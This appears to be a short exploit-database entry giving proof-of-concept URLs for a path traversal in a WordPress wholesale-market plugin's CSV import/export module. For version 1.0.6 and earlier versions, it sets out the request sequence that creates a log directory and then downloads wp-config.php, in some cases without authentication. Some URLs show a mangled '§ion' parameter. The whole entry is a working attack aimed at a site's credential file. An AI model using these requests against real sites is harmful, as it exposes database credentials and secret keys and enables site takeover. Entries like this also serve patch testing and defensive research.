## https://sploitus.com/exploit?id=WPEX-ID:B60A0D3D-148F-4E9B-BAEE-7332890804ED
v 1.0.6
If the wholesale_market_import_error folder does not exist, issue is still exploitable as any authenticated user (same URLs as for v < 1.0.6)
If the folder already exist, exploitable as unauthenticated: https://example.com/wp-admin/admin-post.php?action=ced_cwsm_csv_import_export_module_download_error_log&tab=ced_cwsm_plugin§ion=ced_cwsm_csv_import_export_module&ced_cwsm_log_download=../../../wp-config.php
v < 1.0.6 (as unauthenticated):
First call https://example.com/wp-admin/admin-ajax.php?action=ced_cwsm_csv_import_export_module_read_csv which will create the log directory
Then call http://example.com/wp-admin/admin-ajax.php?action=ced_cwsm_csv_import_export_module_download_error_log&tab=ced_cwsm_plugin§ion=ced_cwsm_csv_import_export_module&ced_cwsm_log_download=../../../wp-config.php to download the wp-config.php